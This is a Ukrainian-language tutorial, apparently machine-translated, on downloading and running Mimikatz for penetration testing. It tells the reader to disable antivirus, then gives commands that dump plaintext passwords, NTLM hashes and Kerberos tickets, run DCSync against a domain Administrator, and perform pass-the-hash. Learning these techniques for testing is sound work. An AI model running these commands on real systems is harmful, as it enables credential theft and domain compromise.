Вступ

Mimikatz – це потужний інструмент, призначений для вилучення паролів, хешів, PIN-кодів і квитків Kerberos з пам’яті у вигляді відкритого тексту. Він широко використовується тестувальниками проникнення і фахівцями з безпеки для оцінки вразливостей систем. Цей посібник надає покроковий підхід до встановлення та використання Mimikatz для етичного тестування безпеки.

Попередження: Несанкціоноване використання Mimikatz є незаконним. Переконайтеся, що у вас є явний дозвіл, перш ніж використовувати його в будь-якому середовищі.

Передумови

Перед встановленням Mimikatz переконайтеся, що у вас є наступне:

  • Комп’ютер з Windows (Windows 7, 10, 11 або Server)

  • Привілеї адміністратора

  • Захисник Windows і будь-яке антивірусне програмне забезпечення вимкнено (Mimikatz часто позначається як шкідливе програмне забезпечення)

Завантаження Mimikatz

Mimikatz – це інструмент з відкритим вихідним кодом, доступний на GitHub. Щоб завантажити його:

  1. Відкрийте веб-браузер і перейдіть за адресою
    https://github.com/gentilkiwi/mimikatz

  2. Натисніть Код > Завантажити ZIP.

  3. Розпакуйте ZIP-архів до обраного вами каталогу.

Ви також можете клонувати сховище за допомогою Git’а:

git clone https://github.com/gentilkiwi/mimikatz.git

Запуск Mimikatz

Оскільки Mimikatz потребує привілеїв адміністратора, виконайте наступні кроки:

  1. Відкрийте командний рядок або PowerShell від імені адміністратора.

  2. Перейдіть до папки, з якої ви розпакували Mimikatz:

    cd pathtomimikatzx64

  3. Запустіть Mimikatz:

    mimikatz.exe

Тепер ви повинні побачити інтерфейс командного рядка з запрошенням:
mimikatz #

Основні команди мімікрії

1. Перевірка системних привілеїв

Перш ніж витягувати облікові дані, перевірте, чи маєте ви достатні привілеї:

privilege::debug

Якщо все пройшло успішно, ви повинні побачити
Привілей ’20’ OK

Витяг паролів з пам’яті

Для вилучення паролів, що зберігаються в пам’яті, використовуйте:

sekurlsa::logonpasswords

Буде показано імена користувачів, домени і паролі у відкритому вигляді, якщо вони доступні.

Дамп NTLM хешів

NTLM хеші можуть бути використані для атак типу “передача хешу”. Щоб витягти їх:

lsadump::sam

Або для віддалених систем:

lsadump::dcsync /domain:targetdomain.com /user:Administrator

Дамп квитків Kerberos

Щоб витягти тікети Kerberos з системи:

sekurlsa::tickets /export

Це експортує .kirbi файли, які можуть бути використані в атаках на перехоплення квитків.

Атака на хеш-супровід

Для автентифікації з використанням NTLM хешу замість пароля:

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>

Висновок

Mimikatz залишається одним з найпотужніших інструментів для оцінки безпеки Windows-систем завдяки своїй здатності витягувати паролі, хеші і тікети Kerberos безпосередньо з пам’яті. При відповідальному та етичному використанні він допомагає фахівцям виявляти вразливості, перевіряти конфігурації інфраструктури домену та покращувати загальний стан безпеки організації. Однак важливо пам’ятати, що такі інструменти, як Mimikatz, повинні використовуватися тільки з офіційного дозволу і в контрольованому середовищі, оскільки несанкціоноване використання порушує закон і може призвести до серйозних наслідків.